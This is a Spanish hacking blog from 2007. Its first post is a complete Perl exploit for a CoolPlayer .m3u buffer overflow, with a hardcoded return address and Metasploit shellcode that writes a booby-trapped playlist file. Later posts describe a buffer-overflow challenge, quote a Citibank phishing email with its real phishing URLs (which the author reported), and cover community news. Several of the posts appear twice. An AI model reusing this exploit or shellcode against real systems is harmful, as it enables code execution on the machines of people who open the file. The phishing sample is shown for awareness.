Despues de pasar por algun problemilla...se pudo solucionar y terminar el exploit listo y funcional:
#!/usr/bin/perl
################################################################################
#####################################
#
#CoolPlayer, Latest Build: 217
#Web:: http://coolplayer.sourceforge.net/
#Playlist(.m3u) File Local Buffer Overflow Exploit
#
#Vuln:http://www.securityfocus.com/bid/21396
#
#Instrucciones:coolplayerm3u.pl debe de estar en el mismo directorio que el perl.exe
#
#Agradecimientos a: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto
# a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi jeje
# TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD
# Además del equipo de www.p1mp4m.es -->musashi,patoruzu,elvispresley,pepepistola,skyline2412
#
# Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y
# el_manguan que estuvo ayudando tambien y probando.
#
#Exploit por: Trancek
#Email:trancek@yashira.org
#
################################################################################
######################################
use Cwd;
print "CoolPlayer 2.17 .m3u Exploit\n\n";
$dir = getcwd()."/";
$lon = length($dir);
$nanai = 260 - $lon;
$junk = 'A' x $nanai;
$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x66".
"\x3f\x59\x90\x83\xeb\xfc\xe2\xf4\x9a\xd7\x1d\x90\x66\x3f\xd2\xd5".
"\x5a\xb4\x25\x95\x1e\x3e\xb6\x1b\x29\x27\xd2\xcf\x46\x3e\xb2\xd9".
"\xed\x0b\xd2\x91\x88\x0e\x99\x09\xca\xbb\x99\xe4\x61\xfe\x93\x9d".
"\x67\xfd\xb2\x64\x5d\x6b\x7d\x94\x13\xda\xd2\xcf\x42\x3e\xb2\xf6".
"\xed\x33\x12\x1b\x39\x23\x58\x7b\xed\x23\xd2\x91\x8d\xb6\x05\xb4".
"\x62\xfc\x68\x50\x02\xb4\x19\xa0\xe3\xff\x21\x9c\xed\x7f\x55\x1b".
"\x16\x23\xf4\x1b\x0e\x37\xb2\x99\xed\xbf\xe9\x90\x66\x3f\xd2\xf8".
"\x5a\x60\x68\x66\x06\x69\xd0\x68\xe5\xff\x22\xc0\x0e\xd0\x97\x70".
"\x06\x57\xc1\x6e\xec\x31\x0e\x6f\x81\x5c\x38\xfc\x05\x11\x3c\xe8".
"\x03\x3f\x59\x90";
$nopeando = "\x90" x 20;
open(m3u, ">./vuln.m3u");
print m3u "$junk";
print m3u "$ret";
print m3u "$nopeando";
print m3u "$shellcode";
print "Instrucciones: coolplayerm3u.pl debe de estar en el mismo directorio que el \n";
print "perl.exe o al llamarlo debes de tener el directorio de perl en las variables de entorno \n\n";
print "Directorio: ",$dir,"\n";
print "Longitud del directorio: ",$lon,"\n";
print "Numero de Junk(A) Total: ",$nanai,"\n\n";
print "Cuidado: Cambiar el archivo de directorio, provoca que no funcione el exploit\n";
print "Depende del directorio actual del archivo .m3u y da problemas en el directorio\n";
print "raiz C:\, F:\, etc...(Son 3 'A' mas)\n\n";
print "Archivo creado\n";
Link: http://www.p1mp4m.es/index.php?showtopic=58
domingo, 30 de diciembre de 2007
martes, 11 de diciembre de 2007
Detecta quién te bloqueó o admite en tu cuenta MSN Messenger - Detector de Estado
Ya que no hablo casi ahora en el blog por poco tiempo, aprovecho para poner un post del blog de paisterist, para hacerle un poco de publicidad jeje, espero que os guste ;)
Paisterist me debes una :P
-----------------------------------------------------------------------------------------
Buenas, hago este post para comentarles mejor de un sitio de mío, Desadmite.com, donde pueden chequear quién te eliminó de su cuenta MSN Messenger. Así, es un detector de estado que deduce quién te bloqueó en el msn analizando tus listas de contactos de la cuenta de MSN Messenger (Passport). Esta web no envía mensajes de MSN a los usuarios de tu lista, sino que, en caso de que lo desees, envía un e-mail como forma de recomendación del sitio. Toma algo así como 10 segundos y tus datos no son almacenados (¿para qué los quiero?).
En fin, con la tranquilidad de que tu cuenta no corre peligro, puedes saber quién te bloqueó, quién te tiene sin admisión o eliminado en su MSN.
Desadmite.com - Descubre quién te bloqueó (o eliminó) de su cuenta MSN Messenger
Saludos
Paisterist me debes una :P
-----------------------------------------------------------------------------------------
Buenas, hago este post para comentarles mejor de un sitio de mío, Desadmite.com, donde pueden chequear quién te eliminó de su cuenta MSN Messenger. Así, es un detector de estado que deduce quién te bloqueó en el msn analizando tus listas de contactos de la cuenta de MSN Messenger (Passport). Esta web no envía mensajes de MSN a los usuarios de tu lista, sino que, en caso de que lo desees, envía un e-mail como forma de recomendación del sitio. Toma algo así como 10 segundos y tus datos no son almacenados (¿para qué los quiero?).
En fin, con la tranquilidad de que tu cuenta no corre peligro, puedes saber quién te bloqueó, quién te tiene sin admisión o eliminado en su MSN.
Desadmite.com - Descubre quién te bloqueó (o eliminó) de su cuenta MSN Messenger
Saludos
sábado, 1 de diciembre de 2007
Yashira On y Mi reto para el que se atreva
Bueno ahora andan en un VPS configurado todo tal y como quieren, para que sea seguro y resista duros ataques de botnets normalitas. Principalmente, es posible gracias a g30rg3_x y a los que colaboraron dando dinero también: skyline2412, patoruzu y Mcrow. Falta mi colaboración que llegará en cuanto me llegue la tarjeta nueva que con la que tenía no me vale.
Así que en Yashira.org ya pusieron la nueva versión con todos sus retos, entre ellos el mio. Os dejo la descripción del mismo y acuérdense es un reto, que no es real del todo y es así porque la cuestión es aprender y asi no tardar demasiado en encontrar la vulnerabilidad.
1º-Ruta Obligada --> C:\RetoOverflow\reto.exe & C:\RetoOverflow\md5.dll
2º-Hacer el reto con permisos de Administrador para evitar cualquier problema, porque puede que no funcione de no hacerlo así, ya cuando descubran el bug sabrán el porqué, o sino después de que lo encontréis os lo digo yo. (Si sabéis que bug es y aún así no os funciona me decís más que nada porque podria dar algun pequeño problema...pero solo cuando ya sepáis cual es la vulnerabilidad).
3º-Este reto no consiste en buscar en el código del reto con un debugger, de momento, el posible error y por ello está empacado con el themida porque no quiero que miréis el código y lo saquéis así porque sí, hay otros modos de descubrir un bug ademas de ver el código y por ahí va parte del reto.
1º-De momento ,solo será necesario que encuentren el bug, y me envien la prueba de que funciona con argumentos AAAA dando el problema en la dirección 41414141, vamos lo de siempre, un access violation ahí.
2º-Guiaros por la lógica y pensar...seguro lo sacáis pronto.
Más adelante espero que esté la version 2 del reto y será algo más complicada porque habrá que ejecutar la calculadora por ejemplo...y como podréis ver más adelante hay trucos, maldito win y las vuln que hay sobre él...ejejej
Para mas información mirar la Ayuda del programa.
El que lo descubra sin trampas de chivatazos y se lo haya currado le paso el código del reto y ya veré si algo más.
Saludos y Suerte
Link: Reto 172
Así que en Yashira.org ya pusieron la nueva versión con todos sus retos, entre ellos el mio. Os dejo la descripción del mismo y acuérdense es un reto, que no es real del todo y es así porque la cuestión es aprender y asi no tardar demasiado en encontrar la vulnerabilidad.
Nombre del reto
Mision para Lara CroftIndicaciones para que funcione bien
1º-Ruta Obligada --> C:\RetoOverflow\reto.exe & C:\RetoOverflow\md5.dll
2º-Hacer el reto con permisos de Administrador para evitar cualquier problema, porque puede que no funcione de no hacerlo así, ya cuando descubran el bug sabrán el porqué, o sino después de que lo encontréis os lo digo yo. (Si sabéis que bug es y aún así no os funciona me decís más que nada porque podria dar algun pequeño problema...pero solo cuando ya sepáis cual es la vulnerabilidad).
3º-Este reto no consiste en buscar en el código del reto con un debugger, de momento, el posible error y por ello está empacado con el themida porque no quiero que miréis el código y lo saquéis así porque sí, hay otros modos de descubrir un bug ademas de ver el código y por ahí va parte del reto.
Como pasar el reto
1º-De momento ,solo será necesario que encuentren el bug, y me envien la prueba de que funciona con argumentos AAAA dando el problema en la dirección 41414141, vamos lo de siempre, un access violation ahí.
2º-Guiaros por la lógica y pensar...seguro lo sacáis pronto.
Futuro
Más adelante espero que esté la version 2 del reto y será algo más complicada porque habrá que ejecutar la calculadora por ejemplo...y como podréis ver más adelante hay trucos, maldito win y las vuln que hay sobre él...ejejej
Para mas información mirar la Ayuda del programa.
Premio
El que lo descubra sin trampas de chivatazos y se lo haya currado le paso el código del reto y ya veré si algo más.
Saludos y Suerte
Link: Reto 172
miércoles, 21 de noviembre de 2007
¿Phising o tontería?
Hoy entro en mi correo y veo un mensaje como lo que me envían últimamente de scam, no se puede registrar la web en ciertos directorios....y bueno los ando guardando todos, para ver al final de año cual ha sido el más original y más creible. Pero resulta que el de hoy no trataba de ello, era un típico correo para quitarte tu cuenta. Yo creo que es la primera vez que me llega uno de un banco, soy feliz jejej pensaba que nunca me llegaría nada así después de tanto tiempo, ahora solo falta que lleguen los virus potentes para asi mirarlos un poquito como son o exploits en archivos.
Ahi va:
------------------------------------------------------------------------
Dear Sir/Madam,
Citibank always looks forward for the high security of our
clients. Some customers have been receiving an email claiming to be
from Citibank advising them to follow a link to what appear
to be a Citibank web site, where they are prompted to enter
their personal Online Banking details. Citibank is in no
way involved with this email and the web site does not belong to us.
Citibank is proud to announce about their new updated secure system.
We updated our new SSL servers to give our customers a better, fast
and secure online banking service.
Due to the recent update of the servers, you are requested to please
update your account info at the following link.
https://web.da-us.citibank.com/cgi-bin/citifi/portal/l/l.do
----------------------------------------------
Bonito link ese último..el que en realidad es: http://www.dewithmaaltijden.nl/include/www.citibank.com/Citi/CitiBank/citibank/index.html
Eso si que es sospechoso, por lo que me fijé envia todo a un archivo .php llamado yassino.php , y estuve buscando en google y aparecieron 2 entradas distintas de foros que daban estas webs:
http://www.autolek.com/images/stories/www.bankofameria.com/Online_BofA_Banking/repution/updating.cfmpage=corp_bofacom/yassino.php
http://yourallergysymptoms.com/onlinebnkig-nw-bankofamerica-com/yassino.php
Es muy probable que sea del mismo autor, al menos la primera porque es del mismo estilo, la cosa que no puedo comprobarlas porque andan off. Ala tengan cuidado que esta forma es de las más sencillitas que te encuentras.
PD: Lo envie a Phistank una web que me encontré para publicar phising, parece importante debido a su número elevado de webs con phising enviados.
Ahi va:
------------------------------------------------------------------------
Dear Sir/Madam,
Citibank always looks forward for the high security of our
clients. Some customers have been receiving an email claiming to be
from Citibank advising them to follow a link to what appear
to be a Citibank web site, where they are prompted to enter
their personal Online Banking details. Citibank is in no
way involved with this email and the web site does not belong to us.
Citibank is proud to announce about their new updated secure system.
We updated our new SSL servers to give our customers a better, fast
and secure online banking service.
Due to the recent update of the servers, you are requested to please
update your account info at the following link.
https://web.da-us.citibank.com/cgi-bin/citifi/portal/l/l.do
 | ||
| This web site is operated by Citibank, N.A., Member FDIC | Security | Site map | Careers | privacy | |
| Copyright © 2007 Citigroup Inc. | ||
----------------------------------------------
Bonito link ese último..el que en realidad es: http://www.dewithmaaltijden.nl/include/www.citibank.com/Citi/CitiBank/citibank/index.html
Eso si que es sospechoso, por lo que me fijé envia todo a un archivo .php llamado yassino.php , y estuve buscando en google y aparecieron 2 entradas distintas de foros que daban estas webs:
http://www.autolek.com/images/stories/www.bankofameria.com/Online_BofA_Banking/repution/updating.cfmpage=corp_bofacom/yassino.php
http://yourallergysymptoms.com/onlinebnkig-nw-bankofamerica-com/yassino.php
Es muy probable que sea del mismo autor, al menos la primera porque es del mismo estilo, la cosa que no puedo comprobarlas porque andan off. Ala tengan cuidado que esta forma es de las más sencillitas que te encuentras.
PD: Lo envie a Phistank una web que me encontré para publicar phising, parece importante debido a su número elevado de webs con phising enviados.
domingo, 18 de noviembre de 2007
Distintos Blogs y paginas buenas
Para que no ocupe mucho los links que suelo ver a diario y que me parecen buenos, o algunos que veo de vez en cuando, voy a poner una lista aqui que ire reyenando.
En Español:
Lista de CracksLatinos
El Lado Del Mal - Chema
Blog S21Sec
Blog de Boken
48bits
SecurityByDefault
Kriptopolis
Blog de Zhodiac
JV Vallejo
Laboratorio de Hispasec
Foro de bugs - elhacker.net
Wadalbertia
h4ck1t - h1t
Blog de JosS
Blog de HaDeS
Blog de Thor
Blog de +NCR/CRC!
Blog de Yibam
Blog de AmeRiK@nO
Todo sobre Hack It - Euskal
En Ingles:
SysInternals - Mark Russinovich
BrowserFun - Cerrado :(
KernelFun
OpenRCE
Alexander Sotirov
Alpha3 Shellcoder - Skylined
Luigi Auriemma
Milw0rm
rvdh - 0x000000 - Browser Attacks
Halvar Flake
Pedram Amini - OpenRCE
Jeremiah Grossman - Web Hacking
Ero Carrera
RSnake - ha.ckers
SecurityTeam
Peter Ferrie
Archivos de las conferencias CanSecWest
Archivos de las conferencias BlackHat
Archivos de BugHunter sobre todo
Ireagregando segun me vaya acordando
En Español:
Lista de CracksLatinos
El Lado Del Mal - Chema
Blog S21Sec
Blog de Boken
48bits
SecurityByDefault
Kriptopolis
Blog de Zhodiac
JV Vallejo
Laboratorio de Hispasec
Foro de bugs - elhacker.net
Wadalbertia
h4ck1t - h1t
Blog de JosS
Blog de HaDeS
Blog de Thor
Blog de +NCR/CRC!
Blog de Yibam
Blog de AmeRiK@nO
Todo sobre Hack It - Euskal
En Ingles:
SysInternals - Mark Russinovich
BrowserFun - Cerrado :(
KernelFun
OpenRCE
Alexander Sotirov
Alpha3 Shellcoder - Skylined
Luigi Auriemma
Milw0rm
rvdh - 0x000000 - Browser Attacks
Halvar Flake
Pedram Amini - OpenRCE
Jeremiah Grossman - Web Hacking
Ero Carrera
RSnake - ha.ckers
SecurityTeam
Peter Ferrie
Archivos de las conferencias CanSecWest
Archivos de las conferencias BlackHat
Archivos de BugHunter sobre todo
Ireagregando segun me vaya acordando
sábado, 17 de noviembre de 2007
Organizando la 1º Ezine Yashira
Hoy es día de revisar la creación de la ezine, ya que me enviaron un artículo largo pero bastante interesante y además tengo que maquetar otro que tenía por ahí, todavía estoy abierto a más artículos que me quieran enviar y hablaré con los admins de Yashira.org para ver si a los que escriban un artículo que se publique en la ezine se les da una cuenta @yashira.org, de momento cuento con 3 maquetados completamente, 1 hecho casi al completo pero que le faltan imágenes y 2 que me tienen que enviar. La cosa sería llegar a los 10 artículos y publicarlos antes de fin de año o al comienzo de éste, pero no se si dará tiempo. Os aseguro que os gustaran para algo está tardando. Recuerdo el link que dejé en yashira:
--------------------------------------------------------------------------------------
Bueno, pues despues de ver todos los votos y la mayoria a favor del si, solo queda abrir la ezine y ponerse al desarrollo de ella.
Para empezar:
1º-Temas a tratar: Pues relacionados con la informática, hacking, ing inversa, criptografía, programación que se puede incluir en alguna de las anteriores, y algunas curiosidades que haya , o artículos especiales, todo dependerá de la información que haya.
2º-Cómo escribirlos: Bueno pues escribirlos como queráis y en el formato que queráis, eso si nada rarito...xD, luego los pasaré a pdf para que se vea mejor y tal, y se pueden incluir imágenes pero no lo carguen demasiado, teoríaa y práctica estaría bien en todos los artículos que se pueda.
3º-Artículos: No tengo por que publicar todo lo que enviéis, cualquier fallo en el artículo se intentará mirar con todo el staff que lo revise y además se pedirá un nivel medio-alto para la ezine, para hacerla una de las mejores que se pueda, aunque se tarde en publicarla.
4º-Colaboraciones: Enviármelas a mi agregándome al msn trancek@gmail.com(el correo no me funciona...),enviando un correo a trancek@yashira.org o enviarme un MP por yashira posteándome un link para coger la info, me meto a diario así que lo veré ok?
5º-Ortografía: Esto intentar ponerlo con las menores faltas posibles y tal, y bueno para explicar algo no utilicen palabras del país propio para que así todos puedan entender bien el artículo.
Saludos y esperemos que este proyecto vaya hacia delante!!!!
--------------------------------------------------------------------------------------
Bueno, pues despues de ver todos los votos y la mayoria a favor del si, solo queda abrir la ezine y ponerse al desarrollo de ella.
Para empezar:
1º-Temas a tratar: Pues relacionados con la informática, hacking, ing inversa, criptografía, programación que se puede incluir en alguna de las anteriores, y algunas curiosidades que haya , o artículos especiales, todo dependerá de la información que haya.
2º-Cómo escribirlos: Bueno pues escribirlos como queráis y en el formato que queráis, eso si nada rarito...xD, luego los pasaré a pdf para que se vea mejor y tal, y se pueden incluir imágenes pero no lo carguen demasiado, teoríaa y práctica estaría bien en todos los artículos que se pueda.
3º-Artículos: No tengo por que publicar todo lo que enviéis, cualquier fallo en el artículo se intentará mirar con todo el staff que lo revise y además se pedirá un nivel medio-alto para la ezine, para hacerla una de las mejores que se pueda, aunque se tarde en publicarla.
4º-Colaboraciones: Enviármelas a mi agregándome al msn trancek@gmail.com(el correo no me funciona...),enviando un correo a trancek@yashira.org o enviarme un MP por yashira posteándome un link para coger la info, me meto a diario así que lo veré ok?
5º-Ortografía: Esto intentar ponerlo con las menores faltas posibles y tal, y bueno para explicar algo no utilicen palabras del país propio para que así todos puedan entender bien el artículo.
Saludos y esperemos que este proyecto vaya hacia delante!!!!
sábado, 10 de noviembre de 2007
Arrestado por espionaje "SyS64738"
Uno de los importantes en la red, Roberto Preatoni(Alias-SyS64738),en el campo de vulnerabilidades y auditorías ha sido detenido por espionaje a Telecom Italia, es famoso por ser el fundador de dos páginas muy famosas en el ámbito del defacing y la auditoría de software, las páginas en cuestión son WabiSabiLabi de la que hablé y que se dedicaba a la venta de vulnerabilidades con sus correspondientes exploits, y además la web para registrar defaces Zone-h. Imparte conferencias en todo el mundo y es el que lleva Hero-Z comics. Respecto al arresto la razón de la detención fue unos ataques junto a otros que no estaban autorizados a hacer los ataques y por realizar intervenciones telefónicas y por ello Telecom Italia les ha denunciado. Así que veremos que pasa y bueno hasta hoy no supe que era también el de Zone-h cosa que me defraudó por ser el creador de la web WabiSabiLabi.
Suscribirse a:
Entradas (Atom)